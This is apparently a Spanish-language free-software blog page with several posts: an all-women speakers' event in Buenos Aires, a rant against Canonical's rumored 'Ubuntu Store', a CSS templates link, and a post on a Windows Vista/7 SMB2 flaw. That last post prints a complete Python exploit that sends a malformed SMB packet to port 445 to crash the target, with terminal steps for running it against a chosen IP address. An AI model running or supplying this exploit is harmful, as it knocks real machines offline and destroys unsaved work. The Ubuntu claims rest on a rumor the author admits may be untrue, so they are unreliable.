En Manos de Nadie

Las mujeres tienen algo que decir

Llamado a presentación de charlas

El sábado 5 de diciembre  de 9 a 19 hs las mujeres que se dedican al software libre realizan un evento destinado a compartir su trabajo y conocerse un poco más. Para esto, convocan a mujeres que trabajen en vinculación al Software Libre, ya sea desde aspectos técnicos, filosóficos, jurídicos, educativos o desde cualquier otro abordaje para participar de esta jornada de charlas y conversaciones.

El evento será libre, gratuito y abierto a todo público sin distinción de género, pero tendrá la particularidad de contar sólo con panelistas mujeres. Esta es la forma que elegimos hoy para dar visibilidad, fomentar y promocionar la participación de mujeres en la comunidad de Software Libre, donde la brecha de género casi habitual en el campo de las nuevas tecnologías, es aún más profunda.

El evento contará con dos salas en paralelo, una dedicada a aspectos técnicos de todo nivel y otra dedicada a aspectos filosóficos y conceptuales y se realizará en el Centro Cultural de la Cooperación, Av. Corrientes 1543, 3er piso. Ciudad de Buenos Aires. Para participar, envianos tus comentarios y propuesta de charlas a Margarita Manterola margamanterola[en]gmail.com.

Varios amigos ya me habían comentado su desconfianza hacia Canonical, la empresa que creó la distribución gnu/linux “Ubuntu” allá por el 2004.

La conocida distro está basada integramente en Debian, y acá encontramos una de las primeras cosas que me hizo dudar. Si buscas dentro de Ubuntu, no vas a encontrar una sola referencia al proyecto Debian. Mucha gente dirá “bueno, la licencia no lo exige”  pero no les parece raro? osea, es como un hijo egocéntrico que tuvo éxito y no reconoce al padre diciendo “soy huérfano” cuando el padre esta vivo y coleando.

Hace poco estaba googleando y leí en un blog (no pude encontrarlo nuevamente) que en la próxima versión de Ubuntu se estrenará el “Ubuntu Store”, una aplicación que reemplazará el “agregar y quitar programas” .  En la misma se ofrecerá a el usuario instalar software libre como hasta ahora pero también ofrecerán aplicaciones privativas de terceros. Aclaro que esto no es oficial, osea no lo leí del sitio de Ubuntu por lo que podría no ser verdad.. ahora, la palabra “store” ya me revuelve el estomago, porque creo que el objetivo final  entonces de Canonical es  aprovecharse del software libre, chuparle la sangre al proyecto Debian para después terminar cagándose en la filosofía del software libre y convirtiéndose en un nuevo MAC, cobrando hasta el aire a los usuarios a travez de su “store” online.

Mucha gente, usuarios de Ubuntu, están bastante confundidos al respecto al creer que este problema se soluciona “no comprando” el soft privativo “y listo”. Pero va más allá de comprarlo o no, una acción como ofrecer Soft privativo mezclado con SL, que a simple vista parece “inocente” en realidad va en contra de los ideales del SL, y ojo, cuando digo “ideales” que no suene utópico, ese ideal son objetivos concretos por los cuales día a día miles de personas trabajan publicando su código en forma libre y poniéndolo a dispocisión de todos:

Software Libre es una cuestión de libertad, no de precio.
Software Libre respeta cuatro libertades esenciales:
0. de ejecutar el programa cuando quieras;
1. de estudiar el código fuente y modificarlo para que haga lo que quieras;
2. de copiar el programa y distribuir las copias cuando quieras;
3. de publicar o distribuir una versión modificada cuando quieras.

Otros usuarios directamente no tienen idea de que es el Software libre (SL) o el software provativo y tampoco les importa. A ellos les recomendaría que lean esto, ya que es una cuestión que debería importarles.

Pero hay otros, justamente los más comprometidos con la comunidad “de Ubuntu” aparentemente según lo que leí en varios blogs  “aceptan” el ubuntu Store alegremente, seguro por “no contradecirse”..  porque claro, cuesta aceptar que tu propia distro te acaba de clavar un puñal en el medio del pecho. Es más fácil negar que aceptar la traición.
Bueno, quizás sea bueno momento para reflexionar sobre qué otras distribuciones de gnu/linux y otros sistemas libres existen y que opciones ofrecen, y animarse a probar, por ejemplo:

El proyecto Debian: un sistema operativo universal.

Sabayon (basado en Gentoo)

OpenSolaris

Fedora (versión libre de RedHat)

DreamLinux (basada en Debian)

Ututo (Distro argentina 100% libre)

Set de templates CSS predefinidos. Los posteo porque me parecen muy útiles en estos dos casos, si estas aprendiendo CSS podés ver como están hechos, que estilos se utilizan para la maquetación, etc.  Si estas comenzando  un proyecto web, te pueden servir para ahorrarte tiempo o como disparador para darle un nuevo formato al diseño del sitio.

Podés verlos y bajarlos acá.

Se detectó una nueva y muy grave vulnerabilidad en el sistema operativo de Micro$oft que afecta las versiones “Vista” y “Seven”. La misma es una falla en SMB2 y permite colapsar remotamente un equipo, haciéndolo mostrar la famosa blue screen of death y obligándolo a reiniciarse, obviamente perdiendo toda la información de la sesión.

El script para explotar dicha vulnerabilidad está escrito en Python y es el siguiente:

#!/usr/bin/python
# When SMB2.0 recieve a "&" char in the "Process Id High" SMB header
# PAGE_FAULT_IN_NONPAGED_AREA 

import sys
from socket import socket
from time import sleep

host = sys.argv[1], 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: -->  normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()

Para ejecutarlo, creamos un archivo  script.py  pegamos el script de arriba dentro del mismo. Hay que modificar donde dice “IP_ADDR” por la dirección IP de la máquina objetivo y lo guardamos.
Luego damos permisos de ejecución al script desde una terminal con:

dfa@diego-factory:~$ chmod +x script.py

y lo ejecutamos:

dfa@diego-factory:~$ python script.py [ ip ]

Microsoft no tiene solución aún para este problema, por lo que lo único que pueden hacer los tristes usuarios de Windows para evitar abusos es desactivar SMB2 o en todo caso, cerrar el puerto 445 o mejor aún, instalar en sus computadoras un sistema operativo libre y seguro.

La fuente original del exploit y la noticia en general me llegó gracias a tty0.

Bajar el cuadernillo:
¿Qué es el software libre y por qué es importante para mí? – Versión A4

www.nomade.org.ar
www.vialibre.org.ar

Si todavía no lo viste ¡no te lo pierdas! Muy recomendado.

Y de yapa, una foto con el gran filósofo contemporáneo y padre del software libre, el señor Richard Stallman en su visita a la Argentina por motivo del evento  Wikimania 2009.